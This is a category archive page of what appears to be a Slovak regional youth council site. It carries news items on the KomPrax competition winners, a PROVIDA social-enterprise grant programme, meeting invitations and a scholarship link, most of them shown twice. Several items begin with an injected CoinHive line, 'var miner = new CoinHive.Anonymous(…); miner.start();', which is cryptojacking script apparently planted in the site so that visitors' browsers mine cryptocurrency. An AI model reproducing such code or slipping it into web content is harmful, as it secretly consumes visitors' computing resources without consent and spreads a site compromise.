Category Archives: Infoservis

Home / Archive by category "Infoservis"

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Za Prešovský kraj bodovali v súťaži s KomPraxom František Höger, Jaroslav Dargaj a Miroslava Ščigulinská

Krajskými víťazmi súťaže s KomPraxom sa stali František Höger (Fintice) s literárnou prácou „Radosť (nielen) z hry“, Jaroslav Dargaj (Banské) s videom „Život ako film – justice“ a Miroslava Ščigulinská (Stará Ľubovňa) s výtvarnou prácou „Letná nálada“. Hlavnou témou súťaže s KomPraxom bolo neformálne vzdelávanie a jeho kreatívne spracovanie. Od novembra minulého roka až do februára tohto roka sa do súťaže mohli zapojiť mladí ľudia vo veku 15 – 30 rokov z celého Slovenska.

Takmer 90 mladých autorov literárnych, výtvarných a multimediálnych prác vyjadrilo v prihlásených dielach svoju predstavu o neformálnom vzdelávaní. Počas marca 2014 prebiehalo verejné hlasovanie na úrovni krajov. Mená víťazov a prác s najvyšším počtom hlasov za všetky kraje nájdete na http://sutazkomprax.iuventa.sk/sk/Kompetencie-pre-prax.html. Hodnotenie prác odbornou porotou, ktorá určí celoslovenských víťazov, v každej z troch kategórií sa bude konať počas júna 2014.

Národný projekt KomPrax ponúka mladým ľuďom od 15 rokov vo všetkých regiónoch možnosť bezplatného víkendového vzdelávania s cieľom získania praktických zručností potrebných pre trh práce. Výstupom je realizácia vlastných malých projektov s dotáciou do 200 eur na každého
účastníka. Vyskúšajú si pritom poznatky, ktoré nadobudli na vzdelávaní ako napríklad: schopnosť efektívne komunikovať, časové plánovanie, či základy projektového a finančného manažmentu.

Do vzdelávacích aktivít národného projektu KomPrax – Kompetencie pre prax je stále možné sa prihlásiť a to vo všetkých regiónoch Slovenska. Projekt potrvá do konca júla 2015. Na účasť v projekte nie sú potrebné žiadne predošlé skúsenosti. Predpokladom je motivácia pracovať na sebe a chuť meniť svoje okolie k lepšiemu.

Viac informácií o národnom projekte KomPrax nájdete na www.komprax.sk

Mgr. Michaela Šuľáková
Oddelenie vzťahov s verejnosťou / Public
Relations Department
IUVENTA – Slovenský inštitút mládeže /
Slovak Youth Institute
Búdková 2
SK – 811 04 Bratislava 1
tel.: (421-2) 59 29 67 03
m.t.: (421-917) 71 88 11
fax: (421-2) 59 29 61 23

Za Prešovský kraj bodovali v súťaži s KomPraxom František Höger, Jaroslav Dargaj a Miroslava Ščigulinská

Krajskými víťazmi súťaže s KomPraxom sa stali František Höger (Fintice) s literárnou prácou „Radosť (nielen) z hry“, Jaroslav Dargaj (Banské) s videom „Život ako film – justice“ a Miroslava Ščigulinská (Stará Ľubovňa) s výtvarnou prácou „Letná nálada“. Hlavnou témou súťaže s KomPraxom bolo neformálne vzdelávanie a jeho kreatívne spracovanie. Od novembra minulého roka až do februára tohto roka sa do súťaže mohli zapojiť mladí ľudia vo veku 15 – 30 rokov z celého Slovenska.

Takmer 90 mladých autorov literárnych, výtvarných a multimediálnych prác vyjadrilo v prihlásených dielach svoju predstavu o neformálnom vzdelávaní. Počas marca 2014 prebiehalo verejné hlasovanie na úrovni krajov. Mená víťazov a prác s najvyšším počtom hlasov za všetky kraje nájdete na http://sutazkomprax.iuventa.sk/sk/Kompetencie-pre-prax.html. Hodnotenie prác odbornou porotou, ktorá určí celoslovenských víťazov, v každej z troch kategórií sa bude konať počas júna 2014.

Národný projekt KomPrax ponúka mladým ľuďom od 15 rokov vo všetkých regiónoch možnosť bezplatného víkendového vzdelávania s cieľom získania praktických zručností potrebných pre trh práce. Výstupom je realizácia vlastných malých projektov s dotáciou do 200 eur na každého
účastníka. Vyskúšajú si pritom poznatky, ktoré nadobudli na vzdelávaní ako napríklad: schopnosť efektívne komunikovať, časové plánovanie, či základy projektového a finančného manažmentu.

Do vzdelávacích aktivít národného projektu KomPrax – Kompetencie pre prax je stále možné sa prihlásiť a to vo všetkých regiónoch Slovenska. Projekt potrvá do konca júla 2015. Na účasť v projekte nie sú potrebné žiadne predošlé skúsenosti. Predpokladom je motivácia pracovať na sebe a chuť meniť svoje okolie k lepšiemu.

Viac informácií o národnom projekte KomPrax nájdete na www.komprax.sk

Mgr. Michaela Šuľáková
Oddelenie vzťahov s verejnosťou / Public
Relations Department
IUVENTA – Slovenský inštitút mládeže /
Slovak Youth Institute
Búdková 2
SK – 811 04 Bratislava 1
tel.: (421-2) 59 29 67 03
m.t.: (421-917) 71 88 11
fax: (421-2) 59 29 61 23

PROGRAM PODPORY PODNIKANIA SO SPOLOČENSKÝM DOPADOM

Nadácia PROVIDA podporí spoločensky prospešné podnikateľské aktivity sumou 68 000 eur.

Dňa 25. septembra 2013 Nadácia PROVIDA vyhlásila grantový program podpory podnikania so spoločenským dopadom pod názvom „Môžu ryby lietať?“, v rámci ktorého prerozdelí celkovo sumu 68 000 eur. Hlavným poslaním grantového programu je podporiť organizácie a jednotlivcov, ktorí prostredníctvom svojich podnikateľských aktivít dokážu prinášať spoločenský prospech s merateľný sociálnym dopadom.

http://www.nadaciaprovida.sk/mozu-ryby-lietat/

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); PROGRAM PODPORY PODNIKANIA SO SPOLOČENSKÝM DOPADOM

Nadácia PROVIDA podporí spoločensky prospešné podnikateľské aktivity sumou 68 000 eur.

Dňa 25. septembra 2013 Nadácia PROVIDA vyhlásila grantový program podpory podnikania so spoločenským dopadom pod názvom „Môžu ryby lietať?“, v rámci ktorého prerozdelí celkovo sumu 68 000 eur. Hlavným poslaním grantového programu je podporiť organizácie a jednotlivcov, ktorí prostredníctvom svojich podnikateľských aktivít dokážu prinášať spoločenský prospech s merateľný sociálnym dopadom.

http://www.nadaciaprovida.sk/mozu-ryby-lietat/

Pozvánka: Stretnutie koordinátorov ŽŠR v Prešove

Dňa 26.6.2012 sa v Prešove uskutoční Pracovné stretnutie koordinátorov Žiackych školských rád stredných škôl na území PSK.

Jeho cieľom je zhodnotenie školského roka 2011/2012 v oblasti činnosti ŽŠR na území PSK a vzdelávania ich členov a tiež vytvorenie plánu činnosti v oblasti práce so ŽŠR v školskom roku 2012/2013.

 

 

Kontaktná osoba:
Lucia Kažimírová
kazimirova@rmpk.sk
+421 902 348 887

 

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Pozvánka: Stretnutie koordinátorov ŽŠR v Prešove

Dňa 26.6.2012 sa v Prešove uskutoční Pracovné stretnutie koordinátorov Žiackych školských rád stredných škôl na území PSK.

Jeho cieľom je zhodnotenie školského roka 2011/2012 v oblasti činnosti ŽŠR na území PSK a vzdelávania ich členov a tiež vytvorenie plánu činnosti v oblasti práce so ŽŠR v školskom roku 2012/2013.

 

 

Kontaktná osoba:
Lucia Kažimírová
kazimirova@rmpk.sk
+421 902 348 887

 

Štipendium veľvyslanca Petra Buriana pre rómskeho študenta

http://www.iuventa.sk/sk/Eurodesk/Novinky/STIPENDIUM-VELVYSLANCA-PETRA-BURIANA-PRE-ROMSKEHO-STUDENTA.alej?ind=

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Štipendium veľvyslanca Petra Buriana pre rómskeho študenta

http://www.iuventa.sk/sk/Eurodesk/Novinky/STIPENDIUM-VELVYSLANCA-PETRA-BURIANA-PRE-ROMSKEHO-STUDENTA.alej?ind=

Valné zhromaždenie členov RMPK

Pozdravujeme Vás členské organizácie RMPK 🙂

pozývame Vás na VZ RMPK, 9.5.2012 v Prešove (miesto bude upresnené po potvrdení vašej účasti).
VZ RMPK je spojené s informačným seminárom a neformálnym stretnutím (nadväznosť na januárové neformálne stretnutie 🙂 Niektorí sme sa zúčastnili a veríme, že tentokrát sa pridajú aj ďalší 🙂

Tešíme sa na stretnutie s vami
Dagmara Verešpejová

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Valné zhromaždenie členov RMPK

Pozdravujeme Vás členské organizácie RMPK 🙂

pozývame Vás na VZ RMPK, 9.5.2012 v Prešove (miesto bude upresnené po potvrdení vašej účasti).
VZ RMPK je spojené s informačným seminárom a neformálnym stretnutím (nadväznosť na januárové neformálne stretnutie 🙂 Niektorí sme sa zúčastnili a veríme, že tentokrát sa pridajú aj ďalší 🙂

Tešíme sa na stretnutie s vami
Dagmara Verešpejová